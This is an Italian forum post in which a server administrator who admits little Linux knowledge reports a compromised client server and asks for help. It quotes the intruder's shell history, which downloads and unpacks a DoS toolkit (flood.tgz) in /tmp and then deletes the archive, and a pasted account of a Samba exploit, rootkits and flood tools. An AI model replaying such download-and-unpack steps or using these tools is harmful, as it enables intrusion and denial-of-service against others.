Salve,
premesso che di linux non ci capisco molto, oggi stavo tranquillamente girellando dentro il server di un mio cliente (Fedora con Plesk) per controllare un paio di cose quando dentro la cartella
/home/xxxxxx/ (xxxxxx è il nome di una persona)
ho trovato un file nominato .bash_history che conteneva il seguente codice
Ho provato a vedere un pò qualcosa in merito al file Flood.tgz e ho trovato che...Codice PHP:
w
uname -a
uname -s
wget
cd /tmp
ls
wget nome.diunsito.com/flood.tgz
tar -xvzf flood.tgz
rm -rf flood.tgz
e
cd
exit
Tempo fa la stessa macchina, a detta di un collaboratore del mio cliente, guardando i log del firewall, produceva migliaia di richieste ai più disparati indirizzi IP e Porte raggiungibili...After successfully exploiting the Samba server, the remote intruder gained the root privilege and installed a rootkit wrapper rkzz.tgz, which contains a trojaned sshd backdoor and a sniffer program. Once the sshd backdoor was installed, the intruder quickly created an ssh connection using PuTTY-0.53b, encrypting all subsequent traffic. Using the ssh connection, the intruder downloaded a program package skk.tgz, which is the SucKit rootkit. It seemed that SucKit could not be installed successfully in the UML, so the intruder downloaded another attack package, flood.tgz , and immediately started a DoS attack. The attack package contained several DoS attack tools, including the infamous smurf, overdrop, and synsend.
Altri collaboratori in seguito hanno detto che era tutto sistemato...
Domande:
Mi spiegate che cosa fa il codice nel file .bash_history? (suppongo che scarichi il file e lo installi..)
Si può sapere chi lo ha fatto?
CHE COSA FA FLOOD.TGZ?
Che devo fare?
Mi preoccupo?
Mi inkakkio?
grrrr....